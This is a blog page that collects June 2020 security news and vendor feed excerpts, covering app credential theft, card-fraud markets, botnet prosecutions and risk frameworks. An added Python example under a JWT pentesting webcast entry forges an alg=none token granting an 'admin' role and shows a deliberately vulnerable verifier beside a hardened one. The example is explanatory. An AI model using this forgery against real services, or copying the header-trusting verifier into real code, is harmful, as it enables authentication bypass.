Posts

Showing posts from June, 2020

SANS - Issue #52 - Volume XXII - SANS Newsbites - June 30th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/52

SBS CyberSecurity - How to Mature Your Disaster Recovery Testing Plan

A challenge many organizations face is understanding if and how they would recover from a disaster or malware event that takes down the production IT infrastructure or datacenter. In today’s workplace, nearly every organization is heavily reliant on IT and may not be able to conduct business without it. Here are some guidelines to help plan, prepare, and test for the unforeseen disaster. from SBS CyberSecurity https://sbscyber.com/resources/how-to-mature-your-disaster-recovery-testing-plan

Schneier - Android Apps Stealing Facebook Credentials

Google has removed 25 Android apps from its store because they steal Facebook credentials: Before being taken down, the 25 apps were collectively downloaded more than 2.34 million times. The malicious apps were developed by the same threat group and, despite offering different features, under the hood all the apps worked the same. According to a report from French cyber-security firm Evina shared with ZDNet today, the apps posed as step counters, image editors, video editors, wallpaper apps, flashlight applications, file managers, and mobile games. The apps offered a legitimate functionality, but they also contained malicious code. Evina researchers say the apps contained code that detected what app a user recently opened and had in the phone's foreground. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/android_apps_st.html

Krebs - COVID-19 ‘Breach Bubble’ Waiting to Pop?

The COVID-19 pandemic has made it harder for banks to trace the source of payment card data stolen from smaller, hacked online merchants. On the plus side, months of quarantine have massively decreased demand for account information that thieves buy and use to create physical counterfeit credit cards. But fraud experts say recent developments suggest both trends are about to change, and likely for the worse. The economic laws of supply and demand hold just as true in the business world as they do in the cybercrime space. Global lockdowns from COVID-19 have resulted in far fewer fraudsters willing or able to visit retail stores to use their counterfeit cards, and the decreased demand has severely depressed prices in the underground for purloined card data. An ad for a site selling stolen payment card data, circa March 2020. That’s according to Gemini Advisory, a New York-based cyber intelligence firm that closely tracks the inventories of dark web stores trafficking in stolen pay

Recorded Future - Protecting Government IT Infrastructures With Security Intelligence

Governments at the federal, state, and local levels are all stretching their IT infrastructure capabilities in order to enable citizens to securely interact online with agency staff members who are working from home. However, these same government agencies are also facing a surge in cybercriminal activity. Threat actors are working overtime to exploit stay-at-home mandates, taking advantage of citizens and government personnel who don’t have strong security measures in place on their home networks. As reported in the New York Times, cybercriminals have used Social Security numbers, home addresses, and other personal information in recent weeks to assume people’s identities and bilk them out of their federal stimulus checks and state unemployment benefits. Local government programs that offer online financial support are likely to come under similar attacks. Even before the stay-at-home mandates were issued, agencies were already a top target for cyberattackers. That’s because gover

SANS - Issue #51 - Volume XXII - SANS Newsbites - June 26th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/51

Schneier - iPhone Apps Stealing Clipboard Data

iOS apps are repeatedly reading clipboard data, which can include all sorts of sensitive information. While Haj Bakry and Mysk published their research in March, the invasive apps made headlines again this week with the developer beta release of iOS 14. A novel feature Apple added provides a banner warning every time an app reads clipboard contents. As large numbers of people began testing the beta release, they quickly came to appreciate just how many apps engage in the practice and just how often they do it. This YouTube video, which has racked up more than 87,000 views since it was posted on Tuesday, shows a small sample of the apps triggering the new warning. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/iphone_apps_ste.html

TrustedSec - Questions after an assessment? Let TrustedSec be your guide.

Are you having trouble remediating your penetration test findings? It might be time to get some help from TrustedSec. After TrustedSec consultants complete security assessments, clients will often ask us to re-test the specific findings from the last test. But in many instances, those same problems exist—sometimes they are exactly the same, but other times, they manifest as different symptoms of the same challenge. Here are a few quick tips to avoid testing the same vulnerabilities over and over. Ask Questions…It’s Free! At TrustedSec, we are always willing to hop on a phone call, answer any questions, or offer advice. Security has gotten very complicated and no one person knows everything about security and compliance—it’s simply too much. Thus, it can be tremendously helpful to run an idea or issue past someone who has been there or helped others with the same situation. Sometimes a little nugget of information can really save you. Look at ‘Blue Team’ or Program Improvement Servi

Black Hills InfoSec - Webcast: Modern Webapp Pentesting: How to Attack a JWT

So much information about testing webapps for security problems is old. Don’t get me wrong, the old stuff still works way more often than we’d like, but there’s more to webapp vulnerabilities than cross-site scripting and SQL injection. Take JWTs – JSON Web Tokens – for example. These are base64 encoded tokens that sometimes get […] The post Webcast: Modern Webapp Pentesting: How to Attack a JWT appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/webcast-modern-webapp-pentesting-how-to-attack-a-jwt/
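The token handling the webcast is about, as an added example that is not code from the Black Hills post: a JWT is three unpadded base64url segments (header, claims, signature), so the first thing a tester does is decode it without checking the signature, and the first thing to try is whether the server honours the token's own alg header. The secret, the claims and both verifiers below are constructed for illustration; verify_trusting_header models a library that accepts whatever algorithm the token names (the classic alg=none weakness), and verify_pinned is the shape a correct verifier takes (server-side allow-list of algorithms, constant-time comparison).

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    # JWT uses base64url with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Re-add the padding that JWT strips so the stdlib decoder accepts it
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(signing_input: bytes, key: bytes) -> str:
    return b64url_encode(hmac.new(key, signing_input, hashlib.sha256).digest())


def make_jwt(payload: dict, key: bytes) -> str:
    # Minimal HS256 issuer: header.payload.signature
    header = {"alg": "HS256", "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}.{sign_hs256(f'{h}.{p}'.encode(), key)}"


def decode_unverified(token: str):
    # Tester's first step: read header and claims without touching the signature
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def forge_alg_none(token: str, **new_claims) -> str:
    # Rewrite the header to alg=none, change claims, and send an empty signature
    header, payload = decode_unverified(token)
    header["alg"] = "none"
    payload.update(new_claims)
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}."


def verify_trusting_header(token: str, key: bytes):
    # VULNERABLE (constructed): the token itself decides how it is verified
    h, p, sig = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p)) if sig == "" else None
    if header.get("alg") == "HS256":
        expected = sign_hs256(f"{h}.{p}".encode(), key)
        return json.loads(b64url_decode(p)) if hmac.compare_digest(expected, sig) else None
    return None


def verify_pinned(token: str, key: bytes, allowed=("HS256",)):
    # Hardened (constructed): the server pins the algorithm and always checks the MAC
    h, p, sig = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") not in allowed:
        return None
    expected = sign_hs256(f"{h}.{p}".encode(), key)
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(p))


# Constructed sample data: a demo secret and a low-privilege token
SECRET = b"constructed-demo-secret"
ORIGINAL = make_jwt({"sub": "alice", "role": "user"}, SECRET)
FORGED = forge_alg_none(ORIGINAL, role="admin")

if __name__ == "__main__":
    print("claims:", decode_unverified(ORIGINAL)[1])
    print("trusting verifier on forged token:", verify_trusting_header(FORGED, SECRET))
    print("pinned verifier on forged token:", verify_pinned(FORGED, SECRET))
```

The forged token carries no signature at all, yet the header-trusting verifier returns its admin claim; the pinned verifier rejects it because "none" is not on the server's allow-list. The same pinning also blocks the related trick of switching an RS256 token to HS256 so the public key gets used as an HMAC secret, since the accepted algorithm is never read from the token.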

Krebs - Russian Cybercrime Boss Burkov Gets 9 Years

A well-connected Russian hacker once described as “an asset of supreme importance” to Moscow was sentenced on Friday to nine years in a U.S. prison after pleading guilty to running a site that sold stolen payment card data, and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks. Alexei Burkov, seated second from right, attends a hearing in Jerusalem in 2015. Photo: Andrei Shirokov / Tass via Getty Images. Alexsei Burkov of St. Petersburg, Russia admitted to running CardPlanet, a site that sold more than 150,000 stolen credit card accounts, and to being a founder of DirectConnection, a closely guarded underground community that attracted some of the world’s most-wanted Russian hackers. As KrebsOnSecurity noted in a November 2019 profile of Burkov’s hacker nickname ‘k0pa,’ “a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled

Schneier - Friday Squid Blogging: Fishing for Jumbo Squid

Interesting article on the rise of the jumbo squid industry as a result of climate change. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/friday_squid_bl_735.html

SBS CyberSecurity - {Onsite} IBA Certified Banking Cybersecurity Manager

Sept 15-16 (Iowa): This course will focus specifically on each element of the FFIEC Cybersecurity Assessment Tool. In addition, we will complete detailed lab exercises that demonstrate how each process works. from SBS CyberSecurity https://sbscyber.com/resources/articleType/ArticleView/articleId/3735/onsite-iba-certified-banking-cybersecurity-manager

Schneier - The Unintended Harms of Cybersecurity

Interesting research: "Identifying Unintended Harms of Cybersecurity Countermeasures": Abstract: Well-meaning cybersecurity risk owners will deploy countermeasures (technologies or procedures) to manage risks to their services or systems. In some cases, those countermeasures will produce unintended consequences, which must then be addressed. Unintended consequences can potentially induce harm, adversely affecting user behaviour, user inclusion, or the infrastructure itself (including other services or countermeasures). Here we propose a framework for preemptively identifying unintended harms of risk countermeasures in cybersecurity. The framework identifies a series of unintended harms which go beyond technology alone, to consider the cyberphysical and sociotechnical space: displacement, insecure norms, additional costs, misuse, misclassification, amplification, and disruption. We demonstrate our framework through application to the complex, multi-stakeholder challenges as

Krebs - New Charges, Sentencing in Satori IoT Botnet Conspiracy

The U.S. Justice Department today criminally charged a Canadian and a Northern Ireland man for allegedly conspiring to build botnets that enslaved hundreds of thousands of routers and other Internet of Things (IoT) devices for use in large-scale distributed denial-of-service (DDoS) attacks. In addition, a defendant in the United States was sentenced today to drug treatment and 18 months community confinement for his admitted role in the botnet conspiracy. Indictments unsealed by a federal court in Alaska today allege 20-year-old Aaron Sterritt from Larne, Northern Ireland, and 31-year-old Logan Shwydiuk of Saskatoon, Canada conspired to build, operate and improve their IoT crime machines over several years. Prosecutors say Sterritt, using the hacker aliases “Vamp” and “Viktor,” was the brains behind the computer code that powered several potent and increasingly complex IoT botnet strains that became known by exotic names such as “Masuta,” “Satori,” “Okiru” and “Fbot.”

TrustedSec - MSBuild: A Profitable Sidekick!

This blog post highlights some good techniques to use when restricted to testing an up-to-date Windows system with low-level user privileges (no local admin) through a Remote Desktop Protocol (RDP) connection. The Situation: At the start of this engagement, I faced the common task of needing to escalate privileges after acquiring low-level access to a Windows system. However, this is an organization that took steps to diversify their system configuration, hardened the OS, applied security patches, hardened group policies, etc. After some general information gathering, it seemed the system was not vulnerable to common privilege escalation techniques that I was aware of. While some good approaches to this situation might be to proxy through an RDP connection with tools like proxychains (https://0x00sec.org/t/a-brief-introduction-to-proxychains/418) or something fancier like SocksOverRDP (https://github.com/nccgroup/SocksOverRDP), another option when trying to avoid using PowerShe

Recorded Future - Demystifying Risk Analysis With Security Intelligence

Editor’s Note: Over the next several weeks, we’re sharing excerpts from the second edition of our popular book, “The Threat Intelligence Handbook: Moving Toward a Security Intelligence Program.” Here, we’re looking at chapter seven, “Threat Intelligence for Risk Analysis.” To read the entire chapter, download your free copy of the handbook. The National Institute of Standards and Technology (NIST) defines risk as a “measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: the adverse impacts that would arise if the circumstance or event occurs; and the likelihood of occurrence.” Seems pretty straightforward, except … Actually measuring risk is anything but. Think about it. Have you ever wanted to change career paths, make a big investment, move to a new city, or skydive out of a plane? Making the right decision requires thoughtful consideration, an understanding of potential benefits and consequences, and how to e

Schneier - Analyzing IoT Security Best Practices

New research: "Best Practices for IoT Security: What Does That Even Mean?" by Christopher Bellman and Paul C. van Oorschot: Abstract: Best practices for Internet of Things (IoT) security have recently attracted considerable attention worldwide from industry and governments, while academic research has highlighted the failure of many IoT product manufacturers to follow accepted practices. We explore not the failure to follow best practices, but rather a surprising lack of understanding, and void in the literature, on what (generically) "best practice" means, independent of meaningfully identifying specific individual practices. Confusion is evident from guidelines that conflate desired outcomes with security practices to achieve those outcomes. How do best practices, good practices, and standard practices differ? Or guidelines, recommendations, and requirements? Can something be a best practice if it is not actionable? We consider categories of best practices, a

Schneier - COVID-19 Risks of Flying

I fly a lot. Over the past five years, my average speed has been 32 miles an hour. That all changed mid-March. It's been 105 days since I've been on an airplane -- longer than any other time in my adult life -- and I have no future flights scheduled. This is all a prelude to saying that I have been paying a lot of attention to the COVID-related risks of flying. We know a lot more about how COVID-19 spreads than we did in March. The "less than six feet, more than ten minutes" model has given way to a much more sophisticated model involving airflow, the level of virus in the room, and the viral load in the person who might be infected. Regarding airplanes specifically: on the whole, they seem safer than many other group activities. Of all the research about contact tracing results I have read, I have seen no stories of a sick person on an airplane infecting other passengers. There are no superspreader events involving airplanes. (That did happen with SARS.) It s

Black Hills InfoSec - Webcast: IPv6: How to Securely Start Deploying

Joff Thyer has dived into everything that is IPv6 and has so much to share about it. He gets really technical, but in a way you’ll be able to understand. Google reports that over 30% of access to its systems comes via the IPv6 protocol going into 2020. Many Internet Service Providers have no remaining choice […] The post Webcast: IPv6: How to Securely Start Deploying appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/webcast-ipv6-how-to-securely-start-deploying/

Recorded Future - How Splunk and Recorded Future Solve Real-World Problems

Splunk Phantom enables security professionals to work smarter, respond faster, and strengthen their defenses through automation and orchestration. Phantom playbooks allow clients to create and automate customized, repeatable security workflows. Recorded Future supercharges those playbooks by inserting elite security intelligence directly into the Splunk platform, giving users the context they need to make informed security decisions fast. Recorded Future’s VP of Integrations, Seth Whitten, visited Splunk’s offices to talk about the history of the partnership between Recorded Future and Splunk Phantom. Whitten also discussed one of his favorite things about Phantom: playbooks. How Clients Benefit From Recorded Future’s Partnership with Splunk Phantom: The benefit of partnering with Splunk Phantom was clear from the start. Recorded Future’s clients were manually conducting security operations and there was a desire to add automation to those operations. “They would have

Schneier - Cryptocurrency Pump and Dump Scams

Really interesting research: "An examination of the cryptocurrency pump and dump ecosystem": Abstract: The surge of interest in cryptocurrencies has been accompanied by a proliferation of fraud. This paper examines pump and dump schemes. The recent explosion of nearly 2,000 cryptocurrencies in an unregulated environment has expanded the scope for abuse. We quantify the scope of cryptocurrency pump and dump schemes on Discord and Telegram, two popular group-messaging platforms. We joined all relevant Telegram and Discord groups/channels and identified thousands of different pumps. Our findings provide the first measure of the scope of such pumps and empirically document important properties of this ecosystem. from Schneier on Security https://www.schneier.com/blog/archives/2020/06/cryptocurrency_.html

SANS - Issue #50 - Volume XXII - SANS Newsbites - June 23rd, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/50

SBS CyberSecurity - How to Gain Additional Value from Your BIA

A lot of effort goes into building out a Business Impact Analysis (BIA) that meets regulation, so you might as well make sure you are using that information to benefit your overall Business Continuity Plan, help you mitigate additional risk to your organization, and make better business decisions. from SBS CyberSecurity https://sbscyber.com/resources/articleType/ArticleView/articleId/3734/how-to-gain-additional-value-from-your-bia

TrustedSec - Using Effectiveness Assessments to Identify Quick Wins

An organization’s overall security posture can be viewed from multiple different angles, such as technical assessments, program assessments, controls assessments, and risk assessments. A number of different frameworks for each of these assessment types exist, intended to help both technical teams as well as leadership organize security program building activities. Some of these include:

- Penetration Testing Execution Standard (PTES)
- NIST Cyber Security Framework (CSF)
- Center for Internet Security (CIS) Critical Security Controls (CSC)
- Factor Analysis of Information Risk (FAIR)

What most of these frameworks are missing is a gauge on how well the existing security inventory stack is performing, based on factors like how a tool has been deployed, how quickly a new rule can be pushed into production, the knowledge and experience of the team managing a tool, or even the maturity of a Security Information and Event Management (SIEM) team’s rule correlation capabilities. This concept of

Recorded Future - Guarding Healthcare Patient Privacy With Security Intelligence

Healthcare providers are under tremendous pressure to adhere to a plethora of privacy-related regulations. But now they have to do so while also experiencing unprecedented levels of cyberattacks. Neither of these points should come as a surprise given the value of the data at risk and the diversity of end-users and compute devices in the healthcare industry — not to mention, the IT environments in which medical devices operate. While new technologies help organizations improve patient care , they also give IT teams a lot of ground to cover when trying to protect patient information and the digital assets of their organizations. Adherence to regulations may help in some cases, but this may also distract from the real task at hand: Improving security posture (versus demonstrating compliance). In this blog, we examine why cybercriminals target the healthcare industry and how organizations can take on the challenge by leveraging the six principles of security intelligence. By applying se